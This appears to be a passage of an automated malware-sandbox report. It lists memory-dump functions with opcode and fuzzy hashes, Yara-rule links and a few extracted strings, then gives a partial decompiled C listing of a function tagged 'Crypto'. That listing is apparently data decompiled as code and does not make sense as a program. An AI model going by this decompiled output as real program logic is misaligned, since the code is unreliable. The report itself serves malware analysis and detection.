Instruction Fuzzy Hash: 47E0E230D51308EFCB55EFF8984429CBBF5AB45301F2081B9C84896350EA3A9A94CB81

Uniqueness

Uniqueness Score: -1.00%

Function 002E00ED, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54a1609d7215320a7d107f8f10bb5c01aca25072adcdbc9ec655108e172d99bb
Instruction ID: 1ab62748f286c39008638c4f3f6d54b6104e880195cd7416a205ede204e46845
Opcode Fuzzy Hash: 54a1609d7215320a7d107f8f10bb5c01aca25072adcdbc9ec655108e172d99bb
Instruction Fuzzy Hash: EED01736D41108CFCB008FA8E0846ECB7B1EB89325F208426C114A7211C33154968F50

Uniqueness

Uniqueness Score: -1.00%

Function 002ED968, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70260936511e2fc722ec15b2731ed3767aee143c86e10d5058999b5e001f7194
Instruction ID: 7c59394742e879fa1312dd445137f50bb9b43e774e3a34538d05b8b706549904
Opcode Fuzzy Hash: 70260936511e2fc722ec15b2731ed3767aee143c86e10d5058999b5e001f7194
Instruction Fuzzy Hash: 40E0E238E40208EFCB40EFE8D94869CBBF4EF49301F1040E9DC4897761EA359A54CB81

Uniqueness

Uniqueness Score: -1.00%

Function 002EE948, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c218dd19c80e8e7d9145b15f288331e8e2dc6fd31956038748ee21fdfd9eb40
Instruction ID: f7b9592db80a7e0317270ee580fb4c8e9a2c2ccad7b7fdeeefb40d3f05f9a231
Opcode Fuzzy Hash: 1c218dd19c80e8e7d9145b15f288331e8e2dc6fd31956038748ee21fdfd9eb40
Instruction Fuzzy Hash: DFE012749441489FD784EFB8E95866C77F4EB05305F2400AACD4693661DA316994CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B72EA0, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a6282f6e93a2d8a0819e73c13a1ddece79962acc2849e0dd8e5f41b5d77cab6
Instruction ID: 4fba7c89fc385665e7040824c02acfa5a28a97ba6ae02ace74cfe0e0f477986c
Opcode Fuzzy Hash: 3a6282f6e93a2d8a0819e73c13a1ddece79962acc2849e0dd8e5f41b5d77cab6
Instruction Fuzzy Hash: 78D01734D40208AFCB40EFFCD94579DB7F4EB44300F1082E9CC4897250EA349A44CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B70E28, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf4b6e3f402c827c2f5dfe0bc267d9dc884f6c0ea04e7af780b99cdbeeb1e6e
Instruction ID: a4ace53d9e9145951ffbf0689123f50579ff1f2507173cc374228a8d2273ad9a
Opcode Fuzzy Hash: 0cf4b6e3f402c827c2f5dfe0bc267d9dc884f6c0ea04e7af780b99cdbeeb1e6e
Instruction Fuzzy Hash: 59D05E70D52208DFC745EFF8980925DB7F4EB01201F6045E9CC0852650EB319A84C781

Uniqueness

Uniqueness Score: -1.00%

Function 00B72F78, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3303a5cca4ee71571a4f2603d493b1182150e5e3c396122c502d6282ab92838a
Instruction ID: 98d5d283b3d06cfe21c32ae1487dcec6b40112b48925754cf5aafa3d0b370cee
Opcode Fuzzy Hash: 3303a5cca4ee71571a4f2603d493b1182150e5e3c396122c502d6282ab92838a
Instruction Fuzzy Hash: AFD05E74D0020CAFCB55FFF9E8592ADBBF4EB45301F1081E9C898A6251EA384A44CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B72062, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 572622d93d49fe6cfd10e8458a22548f8a770d547acd1d12f49a95628384f373
Instruction ID: 113361ee96f3d458ea5322193246dd3471f78fc1150db23dcaae95a4816c5e92
Opcode Fuzzy Hash: 572622d93d49fe6cfd10e8458a22548f8a770d547acd1d12f49a95628384f373
Instruction Fuzzy Hash: 99E04670A01094CFCB18CFA0DC40A5D73F2FB89300F248156C10A97248CB34AD548F18

Uniqueness

Uniqueness Score: -1.00%

Function 002E5948, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6dc3dc263cdfcc8718f69a9abe99cc7c7269ccde419a496f6cb7f539318ca11
Instruction ID: e09595e01fa78063cd90646d54950b710cf61f2849302ab3b4dc2f291d553bb8
Opcode Fuzzy Hash: a6dc3dc263cdfcc8718f69a9abe99cc7c7269ccde419a496f6cb7f539318ca11
Instruction Fuzzy Hash: 26D05E78480144EFC301AFB4ED0DA4F7BA8EB03312F1004A0E40AC2931DB7108D0CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 001323F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193361255.0000000000132000.00000040.00000001.sdmp, Offset: 00132000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a51a60c2eae46c7daf327b92b8e7d09081bebfa01f600ff166c70e5d1ac64f3
Instruction ID: afa6707d79df86ca2bc9a8987335eea56af527e94b030599618ec71f7c551690
Opcode Fuzzy Hash: 5a51a60c2eae46c7daf327b92b8e7d09081bebfa01f600ff166c70e5d1ac64f3
Instruction Fuzzy Hash: 0ED05E79304A818FD7169A1CC1A4B9537D4AB51B04F5644F9E800CB6A3C778E981D200

Uniqueness

Uniqueness Score: -1.00%

Function 002E09E8, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8bb94dafeeb7b5f30bb45553f71d68ad1cb8cb29ee3f8c9600eb2ddbb7e538e
Instruction ID: e5b859a880a9bf40cde9fdd79560b2bd577f0d7d3d0553f20b8cf4a51c2040c0
Opcode Fuzzy Hash: b8bb94dafeeb7b5f30bb45553f71d68ad1cb8cb29ee3f8c9600eb2ddbb7e538e
Instruction Fuzzy Hash: 60D0A930982208EFC708EFA1DA42BADB368AB42300F6000A8E80423362CB702F94C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 002ECFE5, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43544c01b509e2a40124b7f22d7fe1f29f767d58c00308567ad55ef09a12fc9b
Instruction ID: b5f6d8fd06b77530b2b0a98a0a282251123734140d1fe4be9f84e8c1a612c019
Opcode Fuzzy Hash: 43544c01b509e2a40124b7f22d7fe1f29f767d58c00308567ad55ef09a12fc9b
Instruction Fuzzy Hash: 9BE0E2B8D0822DCFDF08CFA9C882B9EBBB5BB59344F215496C005A7254D730AA808F65

Uniqueness

Uniqueness Score: -1.00%

Function 001323BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193361255.0000000000132000.00000040.00000001.sdmp, Offset: 00132000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04587daa44e60dc92e7236f9a101e03b82c4eec65757c64cdf91f95d02a4c774
Instruction ID: 884875612ccbfa55d2a35a4554446ff7702e472b1b32d34c70f286a75b85501e
Opcode Fuzzy Hash: 04587daa44e60dc92e7236f9a101e03b82c4eec65757c64cdf91f95d02a4c774
Instruction Fuzzy Hash: 27D05E343406818BDB15EA0CC294F5973E4BB44B00F0644E8FC008B266C3B8EC80C600

Uniqueness

Uniqueness Score: -1.00%

Function 002E00CD, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5a029f5bb15685f2bb46df01bba7ba1d53d1353a9704e8a9fe7560f0fa6131f
Instruction ID: 69deb6021cecfbfaa1dd1e1a5c7beda47ecb49d2729482ee08bd4b17495c91cd
Opcode Fuzzy Hash: e5a029f5bb15685f2bb46df01bba7ba1d53d1353a9704e8a9fe7560f0fa6131f
Instruction Fuzzy Hash: 8DD0C93AE41108CFCB008FF8E4445DCF771EB89225F209066D514B7311C7319856CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E62D5, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 504999ab021890210e8f304b4762037fa5d63ff2017fb599952b179b35e209d0
Instruction ID: 9c39e97baca6a7c1b44f9977635fcaf242e0ce596f06917c8465b427cbc32457
Opcode Fuzzy Hash: 504999ab021890210e8f304b4762037fa5d63ff2017fb599952b179b35e209d0
Instruction Fuzzy Hash: 24E0B630D22269EFDB94EF24DD91B9CBBB1FB45240F0056E9D40AA7264DB342E99CF14

Uniqueness

Uniqueness Score: -1.00%

Function 002EB4D1, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8907dec691260c253a25b5ca3a17c6e3d000804dfa0c9d2c76dd3423f9244637
Instruction ID: be7deed473e5e04a061dfe79c5489dbe66fb57d34c7ddc47a947e90a347470c1
Opcode Fuzzy Hash: 8907dec691260c253a25b5ca3a17c6e3d000804dfa0c9d2c76dd3423f9244637
Instruction Fuzzy Hash: 6CD067B4D181589FDF00CFD4C941BEEB7B5BB59300F1090969515BB254D7349A158F19

Uniqueness

Uniqueness Score: -1.00%

Function 002E6442, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a1c2d25c4b5e73dfcc89727fed866a442702ebda84afb7d5f9f56debf510f7f
Instruction ID: 2a782282b22beb3d0590ae3ef8a93106d9561e99165e82740975a57b17930e40
Opcode Fuzzy Hash: 6a1c2d25c4b5e73dfcc89727fed866a442702ebda84afb7d5f9f56debf510f7f
Instruction Fuzzy Hash: F0D05B71F1522E9FCB50DF51D98164EB7BABB56200F115596A444A7380D77059404F11

Uniqueness

Uniqueness Score: -1.00%

Function 00B724D4, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fde2621eca689ff15fb4b39bc92eefb19a7652f3625d2df28c7994f48472e029
Instruction ID: 93dc24a33493166999c942d90417a891981e8dfc8fa0a097cfb0129936e91997
Opcode Fuzzy Hash: fde2621eca689ff15fb4b39bc92eefb19a7652f3625d2df28c7994f48472e029
Instruction Fuzzy Hash: 5BD017358043688FEB14CFF0D954ADCBBB0BB00340F2041598006A7190D7388644CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00B723DF, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382daf14227247acb11aacdbdd49b040fe4a8e14785a0812d0e91b55deaa1450
Instruction ID: 5efcfdf9cf77559fc0ace19f678c4e437cfafcde0667131269f44b70a1087386
Opcode Fuzzy Hash: 382daf14227247acb11aacdbdd49b040fe4a8e14785a0812d0e91b55deaa1450
Instruction Fuzzy Hash: 23D0C934808918C5EB24DFA49585A9CFFF0EB05709F9290D4C1BE26105CB300A229A28

Uniqueness

Uniqueness Score: -1.00%

Function 00B72141, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 868b67f2fd5466e463db669a574d6061495810f547c9d6f6f4d6722229dc4ab2
Instruction ID: 5c9224ae5db3c41bddc7fa2cd39649d98a961afa8c94547a778760eb1aa21106
Opcode Fuzzy Hash: 868b67f2fd5466e463db669a574d6061495810f547c9d6f6f4d6722229dc4ab2
Instruction Fuzzy Hash: 2DD01730901354DFD724DBA0DDA4A4DB771FB4A341F209589C00A6B2A4C7345A80CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00B72408, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b7d80b7644892654805d4ead433c2dfc82961b30ec307c41de5f728ee45cf9
Instruction ID: 276999fcc17dea71f811af43fb7c4be19957836a045a5954c75d3201b261aec6
Opcode Fuzzy Hash: 43b7d80b7644892654805d4ead433c2dfc82961b30ec307c41de5f728ee45cf9
Instruction Fuzzy Hash: E6D0C971C0880CC6D714BFB0EEC8AACBEB0EB44341F0484D1C9DD24084CE310679D759

Uniqueness

Uniqueness Score: -1.00%

Function 002EC14B, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae37c2d44e87a011f7f26647bb5265157736c180c5b7c75388cb0b1ce716e99e
Instruction ID: 27765e921268197b8cb341520eedc13dcd50f94c73737bbf6c4d3ff3c6ba1dbe
Opcode Fuzzy Hash: ae37c2d44e87a011f7f26647bb5265157736c180c5b7c75388cb0b1ce716e99e
Instruction Fuzzy Hash: 8BD0CAB4C08158CBCF20CFA8C861BAEF375BF08300F21509A842AB3229C3309A428F09

Uniqueness

Uniqueness Score: -1.00%

Function 002EBB65, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c0be7c15b60529cc48e5ac8df374965d24cb5b13dcb8b826e42c47751d1f1fa
Instruction ID: c4e7275255dd01f0fd9540972beee017011f4de2e8477d820bba919923f8fba5
Opcode Fuzzy Hash: 6c0be7c15b60529cc48e5ac8df374965d24cb5b13dcb8b826e42c47751d1f1fa
Instruction Fuzzy Hash: DBC08CB8C0830C8BCF40CFA4D441B9EB3B9FB49300F3090D68009B3218CB308A408F19

Uniqueness

Uniqueness Score: -1.00%

Function 00B728E5, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeb1c0739536d67d693eae790d1edd527538bcf806ca388f07ae9e38c4574237
Instruction ID: c03296e55459d7f4fc86c448636bada71a1901d7eabbf865c4a2db4306392e26
Opcode Fuzzy Hash: eeb1c0739536d67d693eae790d1edd527538bcf806ca388f07ae9e38c4574237
Instruction Fuzzy Hash: 41D01235805244CFC708CF90E89485CF771FF4A311F10A249C00AA6168C7749940CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00B74A1F, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe0063956e48aec625b3b0bedcf95ce5a1208bcbe484137ceb619df9673e0d76
Instruction ID: fe760c9a96796360d5ceebac51621c67981d59591af0c1ec32004e2acfc6ae5c
Opcode Fuzzy Hash: fe0063956e48aec625b3b0bedcf95ce5a1208bcbe484137ceb619df9673e0d76
Instruction Fuzzy Hash: 1EC08C2285410B49C7208D40854066EE5F0E301341F0062E2002866024E330CA805F48

Uniqueness

Uniqueness Score: -1.00%

Function 00B721B4, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58202d2accdd71c1ce19a29093215f789ab82628edfb061c45254a33e568042
Instruction ID: 918d941806fd12af3ebc18322bb9ebafdbd63e12d1817964028187c949a95b24
Opcode Fuzzy Hash: c58202d2accdd71c1ce19a29093215f789ab82628edfb061c45254a33e568042
Instruction Fuzzy Hash: 74C08C306241408F8358DFD0D54421CB7B0F742380B146528E126AE06CCB389544CB28

Uniqueness

Uniqueness Score: -1.00%

Function 00B72822, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99ace3fde32e589117215846932e5204361577c866af49f8ad31714e1494d2cb
Instruction ID: 878ade96fc1474aa95b2af438547bd7e52912c742e97e4a43789ba68f4f5956b
Opcode Fuzzy Hash: 99ace3fde32e589117215846932e5204361577c866af49f8ad31714e1494d2cb
Instruction Fuzzy Hash: 58C08C30C85204DFC714CBD0CE9446DF7B4FF08380F0090A8C00EAA064C3385900CE30

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002EB179, Relevance: 1.4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

Strings

[N/W, xrefs: 002ED568

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: [N/W
API String ID: 0-2690583375
Opcode ID: 58a7a4b025e900ebf097dbfc994ca1b4fdb6887e6539be29fc9cd1f2b0cec160
Instruction ID: d8472165552f3c5038f2e943c35a5c65b6d9b2c045b6ece87cbfc1cdf52c19eb
Opcode Fuzzy Hash: 58a7a4b025e900ebf097dbfc994ca1b4fdb6887e6539be29fc9cd1f2b0cec160
Instruction Fuzzy Hash: D361CC75D496949FEB19CF678C5528AFFF3AFCA200F18C1EAC8489A265DB300546CF12

Uniqueness

Uniqueness Score: -1.00%

Function 00B71798, Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

Dz, xrefs: 00B71B3D

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID: Dz
API String ID: 0-2870256512
Opcode ID: b7031eb526cb83c1c8694a0e1cec88a3a1eb3166d6ba1f2ceac562b312bc681b
Instruction ID: 32aea13e07b8055f008d2c838cb5eaefd4b9a321f4aa9b9a9e12767a9b7c5902
Opcode Fuzzy Hash: b7031eb526cb83c1c8694a0e1cec88a3a1eb3166d6ba1f2ceac562b312bc681b
Instruction Fuzzy Hash: AE51F874D04219DBDB14CFAAC58049EFBF6FF89304F24C6AAC429AB255D7349A02DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00B71789, Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

Dz, xrefs: 00B71B3D

Memory Dump Source

Source File: 00000004.00000002.2194337909.0000000000B70000.00000040.00000001.sdmp, Offset: 00B70000, based on PE: false

Similarity

API ID:
String ID: Dz
API String ID: 0-2870256512
Opcode ID: fdd25bcf354b361c979721ac1438a88401ec860cac0532a5195b9ca4f6cabd60
Instruction ID: 16ca2cd3e207e82a2dd0d24f053a336799c51985f1b36d203056305ed5596a12
Opcode Fuzzy Hash: fdd25bcf354b361c979721ac1438a88401ec860cac0532a5195b9ca4f6cabd60
Instruction Fuzzy Hash: BA510874D04219DFDB14CFAAC58049EFBF6FF89304B24C5AAC428AB256D7349A42DF64

Uniqueness

Uniqueness Score: -1.00%

Function 002E9BC0, Relevance: 1.4, Strings: 1, Instructions: 138COMMON

Download Yara Rule

Strings

(G7M, xrefs: 002E9C49

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: (G7M
API String ID: 0-2843565713
Opcode ID: 779a0f92ff2445be052c761136ac9243f57206bc1a026ea6d3f57ce057ad171c
Instruction ID: d707494050b36c3fec6ea33dcbbd0231a93970e19252a96cf23e18108619748e
Opcode Fuzzy Hash: 779a0f92ff2445be052c761136ac9243f57206bc1a026ea6d3f57ce057ad171c
Instruction Fuzzy Hash: 4C510474D65259DFCB04DFAAD9809AEFBF1FB89300F60955AD415BB200C370AA90CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 002E9BB0, Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

(G7M, xrefs: 002E9C49

Memory Dump Source

Source File: 00000004.00000002.2193572791.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false

Similarity

API ID:
String ID: (G7M
API String ID: 0-2843565713
Opcode ID: 2d4ce872ad89892cb8d4d3a9372cd265aebd7feaef76b73460370536358d0cde
Instruction ID: cb91d969b6c30603198e889e30f0444348798bb62ffd9cfa3065f014e56f64d5
Opcode Fuzzy Hash: 2d4ce872ad89892cb8d4d3a9372cd265aebd7feaef76b73460370536358d0cde
Instruction Fuzzy Hash: 9F512970D6525ADFCB04DFAAD9809AEFBF1FF49300F60955AE415A7210C330AA91CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 011D85C8, Relevance: .4, Instructions: 427
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E011D85C8(intOrPtr* __eax, signed int __ebx, signed int __ecx, signed int* __edx, void* __edi, signed int __esi, void* __fp0) {
				signed int _t211;
				intOrPtr* _t212;
				signed int _t213;
				signed int _t214;
				intOrPtr* _t215;
				signed char _t217;
				intOrPtr* _t218;
				signed char _t219;
				signed int _t220;
				signed int _t221;
				intOrPtr* _t222;
				signed char _t223;
				intOrPtr* _t224;
				signed char _t225;
				signed char _t227;
				signed char _t230;
				signed int _t232;
				signed int _t233;
				signed char _t234;
				signed char _t235;
				signed int _t236;
				signed char _t237;
				signed int _t239;
				signed char _t240;
				signed char _t241;
				signed char _t242;
				signed char _t243;
				signed char _t246;
				signed char _t247;
				signed char _t248;
				signed char _t250;
				signed char _t251;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed char _t257;
				signed char _t258;
				signed char _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				intOrPtr* _t263;
				intOrPtr* _t264;
				signed char _t266;
				signed char _t269;
				signed char _t270;
				signed char _t271;
				intOrPtr* _t273;
				intOrPtr* _t276;
				intOrPtr* _t277;
				signed char _t279;
				signed char _t280;
				intOrPtr* _t281;
				intOrPtr* _t282;
				intOrPtr* _t283;
				signed char _t284;
				signed char _t285;
				signed char _t286;
				signed char _t287;
				signed char _t289;
				signed int _t290;
				signed char _t291;
				signed char _t292;
				intOrPtr* _t293;
				signed int _t295;
				void* _t296;
				intOrPtr* _t297;
				signed char _t300;
				void* _t302;
				signed int* _t305;
				signed int* _t306;
				signed int* _t308;
				signed int* _t312;
				signed int* _t313;
				void* _t317;
				signed int _t323;
				signed char _t324;
				void* _t326;
				intOrPtr* _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;
				signed int _t330;
				void* _t331;
				void* _t333;
				void* _t335;
				intOrPtr* _t336;
				void* _t339;
				signed int _t342;
				void* _t344;
				void* _t349;
				void* _t351;
				void* _t355;
				intOrPtr* _t362;
				intOrPtr* _t363;
				intOrPtr _t364;
				intOrPtr* _t365;
				signed int _t366;
				signed char _t372;
				signed int _t373;
				signed char _t374;
				void* _t375;
				signed int _t376;
				signed int _t378;
				void* _t379;
				intOrPtr* _t380;
				void* _t382;
				signed char _t384;
				signed int _t385;
				signed int _t387;
				void* _t388;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t394;
				intOrPtr* _t395;
				intOrPtr* _t396;
				signed int _t404;
				signed int _t405;
				signed int* _t406;
				void* _t408;
				void* _t412;
				intOrPtr* _t414;
				void* _t418;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				intOrPtr* _t424;
				void* _t425;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;

				_t360 = __ecx;
				asm("adc ecx, [eax]");
				_t300 = __ebx ^  *__edx;
				asm("out dx, eax");
				_t211 = __eax +  *__eax;
				 *_t211 =  *_t211 & _t211;
				 *_t211 =  *_t211 + _t211;
				 *_t300 =  *_t300 + __edx;
				 *(__edi + __edx - 0xc) =  *(__edi + __edx - 0xc) | _t300;
				_t212 = _t211 +  *_t211;
				asm("loopne 0x23");
				 *_t212 =  *_t212 + _t212;
				 *_t212 =  *_t212 + _t212;
				asm("adc ecx, [eax]");
				_t390 = __edi + 1;
				_t213 = _t212 +  *_t212;
				_t372 = _t213 *  *__ecx >> 0x20;
				_t214 = _t213 *  *__ecx;
				 *_t214 =  *_t214 + _t214;
				 *_t214 =  *_t214 + _t214;
				asm("adc ecx, [eax]");
				 *_t214 =  *_t214 | _t214;
				es = _t300;
				_t215 = _t214 +  *_t214;
				 *_t372 =  *_t372 + _t215;
				 *_t215 =  *_t215 + _t215;
				 *_t215 =  *_t215 + _t215;
				asm("adc ecx, [eax]");
				asm("fst qword [ecx]");
				es = es;
				es = es;
				_t217 = _t215 +  *_t215 ^ 0x00000022;
				 *_t217 =  *_t217 + _t217;
				 *_t217 =  *_t217 + _t217;
				asm("adc ecx, [eax]");
				 *_t372 =  *_t372 << 7;
				es = es;
				_t218 = _t217 +  *_t217;
				asm("o16 and al, [eax]");
				 *_t218 =  *_t218 + _t218;
				 *__ecx =  *__ecx + _t372;
				asm("sbb [eax+0x19], ah");
				asm("sbb [ebx], al");
				_t219 = _t218 +  *_t218;
				 *_t219 =  *_t219 + _t219;
				 *_t219 =  *_t219 + _t219;
				asm("sbb [edx+0x19], bl");
				 *_t300 =  *_t300 + _t219;
				 *_t372 =  *_t372 + _t372;
				asm("adc [eax], eax");
				asm("bound ebx, [ecx-0x3ffffcf9]");
				_t220 = _t219 &  *_t219;
				 *_t220 =  *_t220 + _t220;
				 *__esi =  *__esi + _t372;
				_t373 = _t372 | _t300;
				ds = es;
				asm("adc eax, 0x44000507");
				_t221 = _t220 &  *_t220;
				 *_t221 =  *_t221 + _t221;
				 *_t300 =  *_t300 + _t373;
				 *_t373 =  *_t373 | _t300;
				asm("sbb al, 0x15");
				es = es;
				_t222 = _t221 + 0x235b00;
				 *_t222 =  *_t222 + _t222;
				 *__esi =  *__esi + _t222;
				asm("sbb [edx+0x19], bl");
				 *0x236400 =  *0x236400 + _t222;
				 *_t222 =  *_t222 + _t222;
				 *__esi =  *__esi + _t373;
				asm("sbb [edx], bl");
				es = es;
				_t223 = _t222 + 0x237c00;
				 *_t223 =  *_t223 + _t223;
				 *__esi =  *__esi + _t373;
				 *__ecx =  *__ecx | _t223;
				asm("sbb [edx], ebx");
				_pop(es);
				_t224 = _t223 + 0x239400;
				 *_t224 =  *_t224 + _t224;
				 *__esi =  *__esi + _t224;
				asm("sbb [edx+0x19], bl");
				es = ds;
				_t225 = _t224 + 0x242c00;
				 *_t225 =  *_t225 + _t225;
				 *__esi =  *__esi + _t225;
				_t302 = (_t300 | __ecx) + _t225;
				_t227 = _t225 &  *(_t302 + 5) |  *(_t225 &  *(_t302 + 5));
				asm("les esp, [eax+eax]");
				 *_t227 =  *_t227 + _t227;
				 *0xfc000b00 =  *0xfc000b00 | _t373;
				_t230 = _t227 + _t227 + _t227 + _t227 & 0x00000000;
				 *_t230 =  *_t230 + _t230;
				 *__ecx =  *__ecx + _t230;
				 *((intOrPtr*)(_t373 + 0x20)) =  *((intOrPtr*)(_t373 + 0x20)) + _t373;
				 *((intOrPtr*)(_t230 + _t230)) =  *((intOrPtr*)(_t230 + _t230)) + __ecx;
				asm("sbb ch, [0x0]");
				es = es;
				_t232 = _t230 & 0x0000002d;
				 *_t232 =  *_t232 + _t232;
				 *_t232 =  *_t232 & _t232;
				_t305 = (_t302 + 0x00000001 |  *_t230) + 1;
				_t233 = _t232;
				_t306 =  &(_t305[0]);
